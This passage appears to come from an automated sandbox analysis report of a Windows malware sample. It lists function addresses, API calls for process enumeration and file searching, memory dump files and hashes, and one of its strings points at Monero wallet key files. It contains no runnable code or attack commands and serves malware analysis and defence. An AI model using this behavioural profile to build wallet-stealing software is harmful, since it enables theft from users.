                              • Process32First.KERNEL32(?,00000128), ref: 006986DE
                              • Process32Next.KERNEL32(?,00000128), ref: 006986F3
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • CloseHandle.KERNEL32(?), ref: 00698761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                              • Instruction ID: e16eb9b00ec5023134a0cbe78390f292412913d536e88332ebdf1e242b9f734d
                              • Opcode Fuzzy Hash: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                              • Instruction Fuzzy Hash: 73315971911218ABCF64EB90DD45FEEB7BEFB45700F1041A9A10AA65A0DB306E45CFA1
                              Function 00697980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E00,00000000,?), ref: 006979B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006979B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,006A0E00,00000000,?), ref: 006979C4
                              • wsprintfA.USER32 ref: 006979F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                              • Instruction ID: f5f4d492f384167bc8019fa18423e5f6f358f72cfcd2c2f57ecb21130b22cf91
                              • Opcode Fuzzy Hash: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                              • Instruction Fuzzy Hash: 701127B2904118ABCB18DFC9DD45FBEB7F8FB4CB15F10421AF605A2280E2395940CBB1
                              Function 0069C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0069C74E
                                • Part of subcall function 0069BF9F: __amsg_exit.LIBCMT ref: 0069BFAF
                              • __getptd.LIBCMT ref: 0069C765
                              • __amsg_exit.LIBCMT ref: 0069C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0069C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                              • Instruction ID: 5c9ee928dc7781f0dee2da71b98ac7a91f90e07fc9e2c178aba364251901b3b3
                              • Opcode Fuzzy Hash: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                              • Instruction Fuzzy Hash: 7CF06D329006009BDFA0BBF86946B9933EBAF00730F20514DF404AAAD2DB645941AE9A
                              Function 00694F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00694F7A
                              • lstrcat.KERNEL32(?,006A1070), ref: 00694F97
                              • lstrcat.KERNEL32(?,014891C8), ref: 00694FAB
                              • lstrcat.KERNEL32(?,006A1074), ref: 00694FBD
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                                • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                                • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                                • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                              • Instruction ID: 41fdde4c53423ddd8d702985f4f5abc650967a4b5d1d3b3b57eaaeb5eed5336f
                              • Opcode Fuzzy Hash: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                              • Instruction Fuzzy Hash: 8121C8B69002086BCB98FBB0EC46EE9337DBB55304F004558B64997581EE749AC9CF96